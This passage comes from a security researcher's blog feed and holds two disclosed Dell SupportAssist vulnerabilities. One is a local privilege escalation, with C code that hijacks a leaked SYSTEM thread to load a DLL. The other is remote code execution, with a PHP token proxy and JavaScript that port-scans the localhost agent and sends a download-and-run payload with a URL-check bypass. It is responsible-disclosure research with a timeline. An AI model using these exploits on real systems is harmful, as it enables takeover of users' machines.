For us, the last check is most relevant, and it&apos;s why Dell users will receive this &quot;Optimize System&quot; notification constantly.</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/EBPWdwV.png" class="kg-image" alt="Local Privilege Escalation on Dell machines running Windows" loading="lazy"></figure><p>If you haven&apos;t run the PC Doctor optimization scan for over 14 days, you&apos;ll see this notification every day, how nice. After determining a notification should be created, the method <code>OptimizeSystemTakeOverNotification</code> will call the <code>PushNotification</code> method to issue an &quot;Optimize System&quot; notification.</p><p>For most versions of Windows 10, <code>PushNotification</code> will call a method called <code>LaunchUwpApp</code>. <code>LaunchUwpApp</code> takes the following steps:</p><ol><li>Grab the active console session ID. This value represents the session ID for the user that is currently logged in.</li><li>For every process named &quot;explorer&quot;, it will check if its session ID matches the active console session ID.</li><li>If the explorer process has the same session ID, the agent will duplicate the token of the process.</li><li>Finally, if the duplicated token is valid, the Agent will start a child process named <code>SupportAssistAppWire.exe</code>, with <code>InheritHandles</code> set to true.</li><li><code>SupportAssistAppWire.exe</code> will then create the notification.</li></ol><p>The flaw in the code can be seen in the call to <code>CreateProcessAsUser</code>.</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/9y2LV4Q.png" class="kg-image" alt="Local Privilege Escalation on Dell machines running Windows" loading="lazy"></figure><p>As we saw in the Discovery section of this post, <code>SupportAssistAgent.exe</code>, an elevated process running as <code>SYSTEM</code> starts a child process using the unelevated explorer token and sets <code>InheritHandles</code> to 
true. This means that all inheritable handles that the Agent has will be inherited by the child process. It turns out that the thread handle for the service control handler for the Agent is marked as inheritable.</p><h2 id="exploiting">Exploiting</h2><p>Now that we have a way of getting a FULL CONTROL thread handle to a <code>SYSTEM</code> process, how do we exploit it? Well, the simplest way I thought of was to call <code>LoadLibrary</code> to load our module. In order to do this, we need to get past a few requirements.</p><ol><li>We need to be able to predict the address of a buffer that contains a file path that we can access. For example, if we had a buffer with a predictable address that contained &quot;C:\somepath\etc...&quot;, we could write a DLL file to that path and pass <code>LoadLibrary</code> the buffer address.</li><li>We need to find a way to use <code>QueueUserAPC</code> to call <code>LoadLibrary</code>. This means that we need to have the thread become alertable.</li></ol><p>I thought of various ways I could have my string loaded into the memory of the Agent, but the difficult part was finding a way to predict the address of the buffer. Then I had an idea. Does LoadLibrary accept files that don&#x2019;t have a binary extension?</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/lM0BB3y.png" class="kg-image" alt="Local Privilege Escalation on Dell machines running Windows" loading="lazy"></figure><p>It appeared so! This meant that the file path in a buffer only needed to point to a file we could access, not necessarily one with a binary extension such as <code>.exe</code> or <code>.dll</code>. To find a buffer that was already in memory, I opted to use <code>Process Hacker</code>, which includes a Strings utility with built-in filtering. I scanned for strings in an Image that contained <code>C:\</code>. 
The first hit I got shocked me.</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/9HV3pTD.png" class="kg-image" alt="Local Privilege Escalation on Dell machines running Windows" loading="lazy"></figure><p>Look at the address of the first string, <code>0x180163f88</code>... was a module running without ASLR? Checking the modules list for the Agent, I saw something pretty scary.</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/K3FZRM7.png" class="kg-image" alt="Local Privilege Escalation on Dell machines running Windows" loading="lazy"></figure><p>A module named <code>sqlite3.dll</code> had been loaded with a base address of <code>0x180000000</code>. Checking the module in <code>CFF Explorer</code> confirmed my findings.</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/8ZhqJk0.png" class="kg-image" alt="Local Privilege Escalation on Dell machines running Windows" loading="lazy"></figure><p>The DLL was built without the <code>IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE</code> characteristic, meaning that ASLR was disabled for it. Somehow this got into the final release build of a piece of software deployed on millions of endpoints. This weakness made our lives significantly easier, because the buffer contained the path <code>c:\dev\sqlite\core\sqlite3.pdb</code>, a file path we could access!</p><p>We already determined that the extension makes no difference, meaning that if I write a DLL to <code>c:\dev\sqlite\core\sqlite3.pdb</code> and pass the buffer pointer to <code>LoadLibrary</code>, the module we wrote to <code>c:\dev\sqlite\core\sqlite3.pdb</code> should be loaded.</p><p>Now that we had the first problem sorted, the next part of our exploitation was to get the thread to be alertable. What I found in my testing was that this thread was the service control handler for the Agent. 
This meant that the thread was in a Wait Non-Alertable state, because it was waiting for a service control signal to come through.</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/yTGuNGR.png" class="kg-image" alt="Local Privilege Escalation on Dell machines running Windows" loading="lazy"></figure><p>Checking the service permissions for the Agent, I found that the <code>INTERACTIVE</code> group had some permissions. Luckily, <code>INTERACTIVE</code> includes unprivileged users, meaning that the permissions applied directly to us.</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/nApdmFB.png" class="kg-image" alt="Local Privilege Escalation on Dell machines running Windows" loading="lazy"></figure><p>Both <code>Interrogate</code> and <code>User-defined control</code> send a service control signal to the thread, meaning we can get it out of the Wait state. Since the thread continues execution after receiving a service control signal, we can use <code>SetThreadContext</code> to set the <code>RIP</code> register to a target function. 
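</p><p>Roughly, redirecting the leaked thread and queueing the APC might look like the following sketch. The handle and addresses are assumed to be obtained as described earlier; this is illustrative of the technique, not the exact exploit code:</p>

```c
#include <windows.h>

/* Point the leaked Agent thread at a target routine and queue an APC
   that calls LoadLibraryA on the predictable path buffer. */
void redirect_thread(HANDLE leakedThread, PVOID target, PVOID pathBuffer)
{
    CONTEXT ctx = {0};
    ctx.ContextFlags = CONTEXT_CONTROL;

    /* Briefly suspend so the captured context is stable. */
    SuspendThread(leakedThread);
    GetThreadContext(leakedThread, &ctx);
    ctx.Rip = (DWORD64)target; /* e.g. a routine that alerts the thread */
    SetThreadContext(leakedThread, &ctx);
    ResumeThread(leakedThread);

    /* Once the thread becomes alertable, this APC fires and loads our
       module from the predictable path. */
    QueueUserAPC((PAPCFUNC)LoadLibraryA, leakedThread,
                 (ULONG_PTR)pathBuffer);
}
```

<p>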
The function <code>NtTestAlert</code> was perfect for this situation because it immediately makes the thread alertable and executes our APCs.</p><p>To summarize the exploitation process:</p><ol><li>The stager monitors for the child <code>SupportAssistAppWire.exe</code> process.</li><li>The stager writes a malicious APC DLL to <code>C:\dev\sqlite\core\sqlite3.pdb</code>.</li><li>Once the child process is created, the stager injects our malicious DLL into the process.</li><li>The DLL finds the leaked thread handle using a brute-force method (<code>NtQuerySystemInformation</code> works just as well).</li><li>The DLL sets the <code>RIP</code> register of the Agent&apos;s thread to <code>NtTestAlert</code>.</li><li>The DLL queues an APC, passing in <code>LoadLibraryA</code> as the user routine and <code>0x180163f88</code> (the buffer pointer) as its first argument.</li><li>The DLL issues an <code>INTERROGATE</code> service control to the service.</li><li>The Agent then reaches <code>NtTestAlert</code>, triggering the APC, which causes the APC DLL to be loaded.</li><li>The APC DLL starts our malicious binary (for the PoC, it&apos;s a command prompt) while in the context of a <code>SYSTEM</code> process, achieving local privilege escalation.</li></ol><p>Dell&apos;s advisory can be accessed <a href="https://www.dell.com/support/article/us/en/04/sln317453/dsa-2019-088-dell-supportassist-security-update-for-improper-privilege-management-vulnerability">here</a>.</p><h2 id="demo">Demo</h2><h2 id="privacy-concerns">Privacy concerns</h2><p>After spending a long time reversing the Dell SupportAssist agent, I&apos;ve come across a lot of practices that are, in my opinion, very questionable.
I&apos;ll leave it up to you, the reader, to decide what you consider acceptable.</p><ol><li>On most exceptions, the agent will send the exception detail along with your service tag to Dell&apos;s servers.</li><li>Whenever a file is executed for Download and Auto Install, Dell will send the file name, your service tag, the status of the installer, and the logs for that install to their servers.</li><li>Whenever you scan for driver updates, any updates found will be sent to Dell&#x2019;s servers alongside your service tag.</li><li>Whenever Dell retrieves scan results about your BIOS, PnP drivers, installed programs, and operating system information, all of it is uploaded to Dell servers.</li><li>Every week, your entire log directory is uploaded to Dell servers (yes, Dell logs by default).</li><li>Every two weeks, Dell uploads a &#x201C;heartbeat&#x201D; including your device details, alerts, software scans, and much more.</li></ol><p>You can disable some of this, but it&#x2019;s enabled by default. Think about the millions of endpoints running Dell SupportAssist&#x2026;</p><h2 id="timeline">Timeline</h2><p>04/25/2019 - Initial write-up and proof of concept sent to Dell.</p><p>04/26/2019 - Initial response from Dell.</p><p>05/08/2019 - Dell has confirmed the vulnerability.</p><p>05/27/2019 - Dell has a fix ready to be released within 2 weeks.</p><p>06/19/2019 - Vulnerability disclosed by Dell as an <a href="https://www.dell.com/support/article/us/en/04/sln317453/dsa-2019-088-dell-supportassist-security-update-for-improper-privilege-management-vulnerability">advisory</a>.</p><p>06/28/2019 - Vulnerability disclosed at RECON Montreal 2019.</p>]]></content:encoded></item><item><title><![CDATA[Remote Code Execution on most Dell computers]]></title><description><![CDATA[<p>What computer do you use? Who made it? Have you ever thought about what came with your computer?
When we think of Remote Code Execution (RCE) vulnerabilities en masse, we might think of vulnerabilities in the operating system, but another attack vector to consider is &quot;What third-party software came</p>]]></description><link>https://billdemirkapi.me/remote-code-execution-on-most-dell-computers/</link><guid isPermaLink="false">60276f5ad8acfdb32a87706f</guid><category><![CDATA[Security Research]]></category><dc:creator><![CDATA[Bill Demirkapi]]></dc:creator><pubDate>Tue, 30 Apr 2019 12:52:00 GMT</pubDate><media:content url="https://billdemirkapi.me/content/images/2021/02/dell-supportassist-flaw-1.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://billdemirkapi.me/content/images/2021/02/dell-supportassist-flaw-1.jpg" alt="Remote Code Execution on most Dell computers"><p>What computer do you use? Who made it? Have you ever thought about what came with your computer? When we think of Remote Code Execution (RCE) vulnerabilities en masse, we might think of vulnerabilities in the operating system, but another attack vector to consider is &quot;What third-party software came with my PC?&quot;. In this article, I&apos;ll be looking at a Remote Code Execution vulnerability I found in <a href="https://www.dell.com/support/contents/us/en/04/article/product-support/self-support-knowledgebase/software-and-downloads/supportassist">Dell SupportAssist</a>, software meant to &quot;proactively check the health of your system&#x2019;s hardware and software&quot; and which is &quot;preinstalled on most of all new Dell devices&quot;.</p><h1 id="discovery">Discovery</h1><p>Back in September, I was in the market for a new laptop because my 7-year-old MacBook Pro just wasn&apos;t cutting it anymore. I was looking for an affordable laptop that had the performance I needed, and I decided on Dell&apos;s G3 15 laptop. I decided to upgrade my laptop&apos;s 1 terabyte hard drive to an SSD. After upgrading and re-installing Windows, I had to install drivers.
This is when things got interesting. After visiting Dell&apos;s support site, I was prompted with an interesting option.</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/Bc8Cx6H.png" class="kg-image" alt="Remote Code Execution on most Dell computers" loading="lazy"></figure><p>&quot;Detect PC&quot;? How would it be able to detect my PC? Out of curiosity, I clicked on it to see what happened.</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/USoJume.png" class="kg-image" alt="Remote Code Execution on most Dell computers" loading="lazy"></figure><p>A program which automatically installs drivers for me. Although it was a convenient feature, it seemed risky. The agent wasn&apos;t installed on my computer because it was a fresh Windows installation, but I decided to install it to investigate further. It was very suspicious that Dell claimed to be able to update my drivers through a website.</p><p>Installing it was a painless process with just a click-to-install button. In the shadows, the SupportAssist Installer created the <code>SupportAssistAgent</code> and <code>Dell Hardware Support</code> services. These services corresponded to .NET binaries, making it easy to reverse engineer what they did. After installing, I went back to the Dell website and decided to check what it could find.</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/3koDq6L.png" class="kg-image" alt="Remote Code Execution on most Dell computers" loading="lazy"></figure><p>I opened the Chrome Web Inspector and the Network tab, then pressed the &quot;Detect Drivers&quot; button.</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/bEVfaii.png" class="kg-image" alt="Remote Code Execution on most Dell computers" loading="lazy"></figure><p>The website made requests to port <code>8884</code> on my local computer.
Checking that port out in Process Hacker showed that the <code>SupportAssistAgent</code> service had a web server on that port. What Dell was doing was exposing a REST API of sorts in its service, allowing the Dell website to issue various requests to the agent. The web server replied with a strict <code>Access-Control-Allow-Origin</code> header of <code>https://www.dell.com</code> to prevent other websites from making requests.</p><p>On the web browser side, the client was providing a signature to authenticate various commands. These signatures are generated by making a request to <code>https://www.dell.com/support/home/us/en/04/drivers/driversbyscan/getdsdtoken</code>, which also provides the signature&apos;s expiration time. After pressing download drivers on the web side, this request was of particular interest:</p><pre><code>POST http://127.0.0.1:8884/downloadservice/downloadmanualinstall?expires=expiretime&amp;signature=signature
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/json
Origin: https://www.dell.com
Referer: https://www.dell.com/support/home/us/en/19/product-support/servicetag/xxxxx/drivers?showresult=true&amp;files=1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
</code></pre><p>The body:</p><pre><code class="language-json">[
    {
    &quot;title&quot;:&quot;Dell G3 3579 and 3779 System BIOS&quot;,
    &quot;category&quot;:&quot;BIOS&quot;,
    &quot;name&quot;:&quot;G3_3579_1.9.0.exe&quot;,
    &quot;location&quot;:&quot;https://downloads.dell.com/FOLDER05519523M/1/G3_3579_1.9.0.exe?uid=29b17007-bead-4ab2-859e-29b6f1327ea1&amp;fn=G3_3579_1.9.0.exe&quot;,
    &quot;isSecure&quot;:false,
    &quot;fileUniqueId&quot;:&quot;acd94f47-7614-44de-baca-9ab6af08cf66&quot;,
    &quot;run&quot;:false,
    &quot;restricted&quot;:false,
    &quot;fileId&quot;:&quot;198393521&quot;,
    &quot;fileSize&quot;:&quot;13 MB&quot;,
    &quot;checkedStatus&quot;:false,
    &quot;fileStatus&quot;:-99,
    &quot;driverId&quot;:&quot;4WW45&quot;,
    &quot;path&quot;:&quot;&quot;,
    &quot;dupInstallReturnCode&quot;:&quot;&quot;,
    &quot;cssClass&quot;:&quot;inactive-step&quot;,
    &quot;isReboot&quot;:true,
    &quot;DiableInstallNow&quot;:true,
    &quot;$$hashKey&quot;:&quot;object:175&quot;
    }
]
</code></pre><p>It seemed like the web client could make direct requests to the <code>SupportAssistAgent</code> service to &quot;download and manually install&quot; a program. I decided to find the web server in the <code>SupportAssistAgent</code> service to investigate what commands could be issued.</p><p>On start, Dell SupportAssist starts a web server (System.Net.HttpListener) on either port 8884, 8883, 8886, or 8885. The port depends on whichever one is available, starting with 8884. On a request, the ListenerCallback located in HttpListenerServiceFacade calls ClientServiceHandler.ProcessRequest.</p><p>ClientServiceHandler.ProcessRequest, the base web server function, starts by doing integrity checks, for example making sure the request came from the local machine, among various other checks. Later in this article, we&#x2019;ll get into some of the issues in the integrity checks, but for now most are not important for achieving RCE.</p><p>An important integrity check for us is in ClientServiceHandler.ProcessRequest, specifically the point at which the server checks to make sure my referrer is from Dell. ProcessRequest calls the following function to ensure that I am from Dell:</p><pre><code>// Token: 0x060000A8 RID: 168 RVA: 0x00004EA0 File Offset: 0x000030A0
public static bool ValidateDomain(Uri request, Uri urlReferrer)
{
	return SecurityHelper.ValidateDomain(urlReferrer.Host.ToLower()) &amp;&amp; (request.Host.ToLower().StartsWith(&quot;127.0.0.1&quot;) || request.Host.ToLower().StartsWith(&quot;localhost&quot;)) &amp;&amp; request.Scheme.ToLower().StartsWith(&quot;http&quot;) &amp;&amp; urlReferrer.Scheme.ToLower().StartsWith(&quot;http&quot;);
}

// Token: 0x060000A9 RID: 169 RVA: 0x00004F24 File Offset: 0x00003124
public static bool ValidateDomain(string domain)
{
	return domain.EndsWith(&quot;.dell.com&quot;) || domain.EndsWith(&quot;.dell.ca&quot;) || domain.EndsWith(&quot;.dell.com.mx&quot;) || domain.EndsWith(&quot;.dell.com.br&quot;) || domain.EndsWith(&quot;.dell.com.pr&quot;) || domain.EndsWith(&quot;.dell.com.ar&quot;) || domain.EndsWith(&quot;.supportassist.com&quot;);
}
</code></pre><p>The issue with the function above is that it really isn&#x2019;t a solid check and gives an<br>attacker a lot to work with. To bypass the Referer/Origin check, we have a few options:</p><ol><li>Find a Cross-Site Scripting vulnerability in any of Dell&#x2019;s websites (I should only have to<br>find one on the sites designated for SupportAssist)</li><li>Find a Subdomain Takeover vulnerability</li><li>Make the request from a local program</li><li>Generate a random subdomain name and use an external machine to DNS Hijack the victim. Then, when the victim requests [random].dell.com, we respond with our server.</li></ol><p>In the end, I decided to go with option 4, and I&#x2019;ll explain why a bit later. After verifying the Referer/Origin of the request, ProcessRequest sends the request to corresponding functions for GET, POST, and OPTIONS.</p><p>When I was learning more about how Dell SupportAssist works, I intercepted different types of requests from Dell&#x2019;s support site. Luckily, my laptop had some pending updates, and I was able to intercept requests through my browser&#x2019;s console.</p><p>At first, the website tries to detect SupportAssist by looping through the aforementioned service ports and connecting to the Service Method &#x201C;isalive&#x201D;. What was interesting was that it was passing a &#x201C;Signature&#x201D; parameter and an &#x201C;Expires&#x201D; parameter. To find out more, I reversed the JavaScript side of the browser. Here&#x2019;s what I found out:</p><ol><li>First, the browser makes a request to <a href="https://www.dell.com/support/home/us/en/04/drivers/driversbyscan/getdsdtoken">https://www.dell.com/support/home/us/en/04/drivers/driversbyscan/getdsdtoken</a> and gets the latest &#x201C;Token&#x201D;, or the signatures I was talking about earlier. The endpoint also provides the &#x201C;Expires token&#x201D;.
This solves the signature problem.</li><li>Next, the browser makes a request to each service port with a URL like this: <a href="http://127.0.0.1">http://127.0.0.1</a>:[SERVICEPORT]/clientservice/isalive/?expires=[EXPIRES]&amp;signature=[SIGNATURE].</li><li>The SupportAssist client on the correct service port then responds with a body like this:</li></ol><pre><code class="language-json">{
	&quot;isAlive&quot;: true,
	&quot;clientVersion&quot;: &quot;[CLIENT VERSION]&quot;,
	&quot;requiredVersion&quot;: null,
	&quot;success&quot;: true,
	&quot;data&quot;: null,
	&quot;localTime&quot;: [EPOCH TIME],
	&quot;Exception&quot;: {
		&quot;Code&quot;: null,
		&quot;Message&quot;: null,
		&quot;Type&quot;: null
	}
}
</code></pre><ol><li>Once the browser sees this, it continues with further requests using the now-determined<br>service port.</li></ol><p>One concerning thing I noticed while looking at the different types of requests I could make was that I could get a very detailed description of every piece of hardware connected to my computer using the &#x201C;getsysteminfo&#x201D; route. Even through Cross-Site Scripting, I was able to access this data, which is an issue because I could seriously fingerprint a system and find some sensitive information.</p><p>Here are the methods the agent exposes:</p><pre><code>clientservice_getdevicedrivers - Grabs available updates.
diagnosticsservice_executetip - Takes a tip guid and provides it to the PC Doctor service (Dell Hardware Support).
downloadservice_downloadfiles - Downloads a JSON array of files.
clientservice_isalive - Used as a heartbeat and returns basic information about the agent.
clientservice_getservicetag - Grabs the service tag.
localclient_img - Connects to SignalR (Dell Hardware Support).
diagnosticsservice_getsysteminfowithappcrashinfo - Grabs system information with crash dump information.
clientservice_getclientsysteminfo - Grabs information about devices on system and system health information optionally.
diagnosticsservice_startdiagnosisflow - Used to diagnose issues on system.
downloadservice_downloadmanualinstall - Downloads a list of files but does not execute them.
diagnosticsservice_getalertsandnotifications - Gets any alerts and notifications that are pending.
diagnosticsservice_launchtool - Launches a diagnostic tool.
diagnosticsservice_executesoftwarefixes - Runs remediation UI and executes a certain action.
downloadservice_createiso - Download an ISO.
clientservice_checkadminrights - Check if the Agent is privileged.
diagnosticsservice_performinstallation - Update SupportAssist.
diagnosticsservice_rebootsystem - Reboot system.
clientservice_getdevices - Grab system devices.
downloadservice_dlmcommand - Check on the status of or cancel an ongoing download.
diagnosticsservice_getsysteminfo - Call GetSystemInfo on PC Doctor (Dell Hardware Support).
downloadservice_installmanual - Install a file previously downloaded using downloadservice_downloadmanualinstall.
downloadservice_createbootableiso - Download a bootable ISO.
diagnosticsservice_isalive - Heartbeat check.
downloadservice_downloadandautoinstall - Downloads a list of files and executes them.
clientservice_getscanresults - Gets driver scan results.
downloadservice_restartsystem - Restarts the system.
</code></pre><p>The one that caught my interest was <code>downloadservice_downloadandautoinstall</code>. This method would download a file from a specified URL and then run it. This method is run by the browser when certain drivers need to be installed automatically.</p><ol><li>After finding which drivers need updating, the browser makes a POST request to &#x201C;<a href="http://127.0.0.1">http://127.0.0.1</a>:[SERVICE PORT]/downloadservice/downloadandautoinstall?expires=[EXPIRES]&amp;signature=[SIGNATURE]&#x201D;.</li><li>The browser sends a request with the following JSON structure:</li></ol><pre><code class="language-json">[
	{
	&quot;title&quot;:&quot;DOWNLOAD TITLE&quot;,
	&quot;category&quot;:&quot;CATEGORY&quot;,
	&quot;name&quot;:&quot;FILENAME&quot;,
	&quot;location&quot;:&quot;FILE URL&quot;,
	&quot;isSecure&quot;:false,
	&quot;fileUniqueId&quot;:&quot;RANDOMUUID&quot;,
	&quot;run&quot;:true,
	&quot;installOrder&quot;:2,
	&quot;restricted&quot;:false,
	&quot;fileStatus&quot;:-99,
	&quot;driverId&quot;:&quot;DRIVER ID&quot;,
	&quot;dupInstallReturnCode&quot;:0,
	&quot;cssClass&quot;:&quot;inactive-step&quot;,
	&quot;isReboot&quot;:false,
	&quot;scanPNPId&quot;:&quot;PNP ID&quot;,
	&quot;$$hashKey&quot;:&quot;object:210&quot;
	}
] 
</code></pre><ol><li>After doing the basic integrity checks we discussed before, ClientServiceHandler.ProcessRequest sends the ServiceMethod and the parameters we passed to ClientServiceHandler.HandlePost.</li><li>ClientServiceHandler.HandlePost first puts all parameters into a nice array, then calls ServiceMethodHelper.CallServiceMethod.</li><li>ServiceMethodHelper.CallServiceMethod acts as a dispatch function, and calls the function given the ServiceMethod. For us, this is the &#x201C;downloadandautoinstall&#x201D; method:</li></ol><pre><code>if (service_Method == &quot;downloadservice_downloadandautoinstall&quot;)
{
	string files5 = (arguments != null &amp;&amp; arguments.Length != 0 &amp;&amp; arguments[0] != null) ? arguments[0].ToString() : string.Empty;
	result = DownloadServiceLogic.DownloadAndAutoInstall(files5, false);
} 
</code></pre><p>Which calls DownloadServiceLogic.DownloadAndAutoInstall and provides the files we sent in the JSON payload.<br>6. DownloadServiceLogic.DownloadAndAutoInstall acts as a wrapper (i.e. handling exceptions) for DownloadServiceLogic._HandleJson.<br>7. DownloadServiceLogic._HandleJson deserializes the JSON payload containing the list of files to download, and does the following integrity checks:</p><pre><code>foreach (File file in list)
{
	bool flag2 = file.Location.ToLower().StartsWith(&quot;http://&quot;);
	if (flag2)
	{
		file.Location = file.Location.Replace(&quot;http://&quot;, &quot;https://&quot;);
	}
	bool flag3 = file != null &amp;&amp; !string.IsNullOrEmpty(file.Location) &amp;&amp; !SecurityHelper.CheckDomain(file.Location);
	if (flag3)
	{
		DSDLogger.Instance.Error(DownloadServiceLogic.Logger, &quot;InvalidFileException being thrown in _HandleJson method&quot;);
		throw new InvalidFileException();
	}
}
DownloadHandler.Instance.RegisterDownloadRequest(CreateIso, Bootable, Install, ManualInstall, list);
</code></pre><p>The above code loops through every file, replaces http:// with https:// in any file URL that starts with http://, and checks that the URL&#x2019;s host matches a list of Dell&#x2019;s download servers (exact hostnames this time, not arbitrary subdomains):</p><pre><code>public static bool CheckDomain(string fileLocation)
{
	List&lt;string&gt; list = new List&lt;string&gt;
	{
		&quot;ftp.dell.com&quot;,
		&quot;downloads.dell.com&quot;,
		&quot;ausgesd4f1.aus.amer.dell.com&quot;
	};
	
	return list.Contains(new Uri(fileLocation.ToLower()).Host);
} 
</code></pre><ol><li>Finally, if all these checks pass, the files get sent to DownloadHandler.RegisterDownloadRequest, at which point SupportAssist downloads and runs the files <em>as Administrator</em>.</li></ol><p>This is all the information we need to start writing an exploit.</p><h1 id="exploitation">Exploitation</h1><p>The first issue we face is making requests to the SupportAssist client. Assume we are in the context of a Dell subdomain; we&#x2019;ll get into how exactly we do this later in this section. I decided to mimic the browser and make requests using JavaScript.</p><p>First things first, we need to find the service port. We can do this by polling through the predefined service ports, and making a request to &#x201C;/clientservice/isalive&#x201D;. The issue is that we need to also provide a signature. To get the signature that we pass to isalive, we can make a request to &#x201C;<a href="https://www.dell.com/support/home/us/en/04/drivers/driversbyscan/getdsdtoken">https://www.dell.com/support/home/us/en/04/drivers/driversbyscan/getdsdtoken</a>&#x201D;.</p><p>This isn&#x2019;t as straightforward as it might seem. The &#x201C;Access-Control-Allow-Origin&#x201D; of the signature URL is set to &#x201C;<a href="https://www.dell.com">https://www.dell.com</a>&#x201D;. This is a problem, because we&#x2019;re in the context of a subdomain, probably not HTTPS. How do we get past this barrier? We make the request from our own servers!</p><p>The signatures that are returned from &#x201C;getdsdtoken&#x201D; are applicable to all machines, and not unique. I made a small PHP script that will grab the signatures:</p><pre><code class="language-php">&lt;?php
header(&apos;Access-Control-Allow-Origin: *&apos;);
echo file_get_contents(&apos;https://www.dell.com/support/home/us/en/04/drivers/driversbyscan/getdsdtoken&apos;);
?&gt; 
</code></pre><p>The header call allows anyone to make a request to this PHP file, and we just echo the signatures, acting as a proxy to the &#x201C;getdsdtoken&#x201D; route. The &#x201C;getdsdtoken&#x201D; route returns JSON with signatures and an expiration time. We can just use JSON.parse on the results to place the signatures into a JavaScript object.</p><p>Now that we have the signature and expire time, we can start making requests. I made a small function that loops through each server port, and if we reach it, sets the global server_port variable to the port that responded:</p><pre><code class="language-javascript">function FindServer() {
	ports.forEach(function(port) {
		var is_alive_url = &quot;http://127.0.0.1:&quot; + port + &quot;/clientservice/isalive/?expires=&quot; + signatures.Expires + &quot;&amp;signature=&quot; + signatures.IsaliveToken;
		var response = SendAsyncRequest(is_alive_url, function(){server_port = port;});
	});
} 
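// Note: FindServer references a SendAsyncRequest helper that is not shown
// in this post. A minimal sketch of what it could look like (an assumption
// for illustration, not the author's original helper):
function SendAsyncRequest(url, on_success) {
	var xmlhttp = new XMLHttpRequest();
	xmlhttp.open('GET', url, true);
	xmlhttp.onreadystatechange = function() {
		// readyState 4 means the request finished; treat an HTTP 200 from
		// the isalive route as a live agent on this port.
		if (xmlhttp.readyState === 4) {
			if (xmlhttp.status === 200) {
				on_success();
			}
		}
	};
	xmlhttp.send();
	return xmlhttp;
}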
</code></pre><p>After we have found the server, we can send our payload. This was the hardest part; we had some serious obstacles to clear before &#x201C;downloadandautoinstall&#x201D; would execute our payload.</p><p>Starting with the hardest issue, the SupportAssist client has a hard whitelist on file locations. Specifically, its host <strong>must</strong> be either &quot;ftp.dell.com&quot;, &quot;downloads.dell.com&quot;, or &quot;ausgesd4f1.aus.amer.dell.com&quot;. I almost gave up at this point, because I couldn&#x2019;t find an open redirect vulnerability on any of the sites. Then it hit me: we can do a man-in-the-middle attack.</p><p>If we could provide the SupportAssist client with an <em>http://</em> URL, we could easily intercept and change the response! This somewhat solves the hardest challenge.</p><p>The second obstacle was designed specifically to counter my solution to the first obstacle. If we look back to the steps I outlined, if the file URL starts with <em>http://</em>, it will be replaced by <em>https://</em>. This is an issue, because we can&#x2019;t really intercept and change the contents of a proper HTTPS connection. The key to bypassing this mitigation was in this sentence: &#x201C;if the URL <em>starts with</em> http://, it will be replaced by https://&#x201D;. See, the thing was, if the URL string did not start with <em>http://</em>, even if there was <em>http://</em> somewhere else in the string, it wouldn&#x2019;t be replaced. Getting a URL to work was tricky, but I eventually came up with &#x201C; <a href="http://downloads.dell.com/abcdefg">http://downloads.dell.com/abcdefg</a>&#x201D; (the space is intentional). When you ran the string through the starts-with check, it would return false, because the string starts with &#x201C; &#x201D;, thus leaving the &#x201C;http://&#x201D; alone.</p><p>I made a function that automated sending the payload:</p><pre><code class="language-javascript">function SendRCEPayload() {
	var auto_install_url = &quot;http://127.0.0.1:&quot; + server_port + &quot;/downloadservice/downloadandautoinstall?expires=&quot; + signatures.Expires + &quot;&amp;signature=&quot; + signatures.DownloadAndAutoInstallToken;

	var xmlhttp = new XMLHttpRequest();
	xmlhttp.open(&quot;POST&quot;, auto_install_url, true);

	var files = [];
	
	files.push({
	&quot;title&quot;: &quot;SupportAssist RCE&quot;,
	&quot;category&quot;: &quot;Serial ATA&quot;,
	&quot;name&quot;: &quot;calc.EXE&quot;,
	&quot;location&quot;: &quot; http://downloads.dell.com/calc.EXE&quot;, // the leading space is KEY
	&quot;isSecure&quot;: false,
	&quot;fileUniqueId&quot;: guid(),
	&quot;run&quot;: true,
	&quot;installOrder&quot;: 2,
	&quot;restricted&quot;: false,
	&quot;fileStatus&quot;: -99,
	&quot;driverId&quot;: &quot;FXGNY&quot;,
	&quot;dupInstallReturnCode&quot;: 0,
	&quot;cssClass&quot;: &quot;inactive-step&quot;,
	&quot;isReboot&quot;: false,
	&quot;scanPNPId&quot;: &quot;PCI\\VEN_8086&amp;DEV_282A&amp;SUBSYS_08851028&amp;REV_10&quot;,
	&quot;$$hashKey&quot;: &quot;object:210&quot;});
	
	xmlhttp.send(JSON.stringify(files)); 
}
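// Two hypothetical helpers for context. First, SendRCEPayload above calls
// guid(), which is not shown in this post; a minimal RFC 4122-style
// version 4 UUID sketch (my assumption, not the author's original):
function guid() {
	var hex = '0123456789abcdef';
	var out = '';
	'xxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxx'.split('').forEach(function(ch) {
		if (ch === 'x') {
			out += hex.charAt(Math.floor(Math.random() * 16));
		} else if (ch === 'y') {
			// UUIDv4 variant nibble: one of 8, 9, a, b
			out += '89ab'.charAt(Math.floor(Math.random() * 4));
		} else {
			out += ch;
		}
	});
	return out;
}

// Second, why the leading space in the location field works: the agent only
// rewrites URLs that *start with* http://. Mirroring that check makes the
// bypass obvious:
function WouldBeRewrittenToHttps(location) {
	return location.toLowerCase().indexOf('http://') === 0;
}
// ' http://downloads.dell.com/calc.EXE' begins with a space, so the check
// returns false and the URL keeps its interceptable http:// scheme.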
